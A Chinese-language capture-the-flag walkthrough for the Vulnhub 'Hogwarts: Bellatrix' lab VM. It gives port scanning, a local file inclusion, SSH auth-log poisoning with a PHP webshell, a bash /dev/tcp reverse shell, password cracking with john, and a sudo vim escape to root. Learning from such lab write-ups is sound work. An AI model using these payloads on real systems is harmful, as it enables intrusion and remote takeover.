首页 > 其他分享 >Vulnhub: Hogwarts: Bellatrix靶机

Vulnhub: Hogwarts: Bellatrix靶机

时间:2023-09-01 18:00:37浏览次数:44  
标签:log .. ikilledsiriusblack 192.168 Bellatrix Hogwarts Vulnhub php 111.228

kali:192.168.111.111

靶机:192.168.111.228

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.228

image

访问80端口

image

查看源码,提示ikilledsiriusblack.php和文件包含的参数名file

image

漏洞利用

ikilledsiriusblack.php存在文件包含

http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../etc/passwd

image

可以包含ssh日志文件/var/log/auth.log

http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../var/log/auth.log

image

写入webshell到ssh日志文件

ssh '<?php system($_GET["cmd"]);?>'@192.168.111.228

image

执行命令

http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../var/log/auth.log&cmd=id

image

执行反弹shell

bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

image

提权

/var/www/html/c2VjcmV0cw==目录中发现密码字典和lestrange的密码密文

image

image

利用john爆破密文,密码:ihateharrypotter

john hash --wordlist=./pass.txt

image

lestrange用户sudo权限

image

提权方法:https://gtfobins.github.io/gtfobins/vim/#sudo

image

提升为root

sudo -u root vim -c ':!/bin/bash'

image

flag

image

标签:log,..,ikilledsiriusblack,192.168,Bellatrix,Hogwarts,Vulnhub,php,111.228
From: https://www.cnblogs.com/ctostm/p/17672600.html

相关文章

  • Vulnhub: Ragnar Lothbrok: 1靶机
    kali:192.168.111.111靶机:192.168.111.226信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.226作者提示修改hosts文件目录爆破gobusterdir-uhttp://armbjorn-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,ba......
  • 【渗透测试】Vulnhub EMPIRE BREAKOUT
    渗透环境攻击机:   IP: 192.168.149.128(Kali)靶机:     IP:192.168.149.130靶机下载地址:https://www.vulnhub.com/entry/empire-breakout,751/进行渗透一、获取IP及端口信息开机已经能看到靶机的IP,我们就不再扫描网段了。扫描端口、系统、版本nmap-sV-......
  • Vulnhub: DriftingBlues: 1靶机
    kali:192.168.111.111靶机:192.168.111.215信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.21580端口首页源码访问noteforkingfish.txt,发现为Ook!加密的密文解密后提示需要用户eric和修改hosts文件,解密网站:https://www.splitbrain.org/ser......
  • Vulnhub: DOUBLE: 1靶机
    kali:192.168.111.111靶机:192.168.111.209信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.209目标80端口sendcommand.php页面源码写入webshell<?phpsystem($_GET["cmd"]);?>执行命令http://192.168.111.209/production/sendcommand......
  • 0×03 Vulnhub 靶机渗透总结之 KIOPTRIX: LEVEL 1.2 (#3) SQL注入+sudo提权
    0×03Vulnhub靶机渗透总结之KIOPTRIX:LEVEL1.2(#3)......
  • Vulnhub: ICMP: 1靶机
    kali:192.168.111.111靶机:192.168.111.208信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.20880端口的cms为Monitorr1.7.6m搜索发现该版本的cms存在远程代码执行searchsploitmonitorr漏洞利用nc本地监听,再执行exppython348980.pyh......
  • 【渗透测试】 Vulnhub JANGOW: 1.0.1
    渗透环境攻击机:   IP: 192.168.149.128(Kali)靶机:     IP:192.168.149.129靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/进行渗透一、获取IP及端口信息使用nmap扫描同网段IP,如果使用的是VMware可能出现扫描不到的情况,需要在靶机的恢复模式里......
  • Vulnhub: DriftingBlues: 2靶机
    kali:192.168.111.111靶机:192.168.111.207信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.20780端口的/blog目录为wordpresswpscan收集wordpress用户和爆破密码wpscan--urlhttp://driftingblues.box/blog-eu,ap--plugins-detectionmi......
  • 【Vulnhub】OSCP
    靶场介绍靶场下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/靶场难度:容易kali:192.168.11.5靶机:192.168.11.13信息收集使用nmap扫描靶机开放的端口及服务nmap-A-T4-sS192.168.11.13可以看到靶机开启了22和80端口使用dirb扫描一下目录扫出来一个r......
  • Vulnhub: MoneyBox: 1靶机
    kali:192.168.111.111靶机:192.168.111.194信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.194ftp匿名登录发现trytofind.jpg目录爆破发现blogs目录gobusterdir-uhttp://192.168.111.194-w/usr/share/wordlists/dirbuster/directory-li......